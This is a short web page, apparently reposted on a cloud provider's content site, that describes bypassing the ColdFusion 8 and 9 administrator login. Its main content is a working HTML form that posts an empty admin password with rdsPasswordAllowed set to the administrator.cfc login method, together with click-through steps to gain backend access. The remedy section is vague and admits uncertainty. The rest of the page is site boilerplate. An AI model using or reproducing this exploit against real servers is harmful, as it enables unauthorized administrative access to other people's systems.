Log on to the background without the coldfusion8 logon Interface

Source: Internet
Author: User

When you log on to the background of coldfusion version 8, you only need to submit a form to bypass user name and password verification. log on to the background. This is the logon page and then write a form submission page locally.

<Form action = "http://XXXX.XXX/CFIDE/adminapi/administrator.cfc? Method = login "method =" post "> <input type =" hidden "name =" adminpassword "value =" "> <input type =" hidden "name =" rdsPasswordAllowed "value = "1"> <input type = "submit"> </form>

 

Save as html run and click "Submit query" and then access the logon page again. Now, the system is in the background.

This vulnerability is used in coldfusion8 and 9
Solution:

The solution is to add a filtering method. I am not sure.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.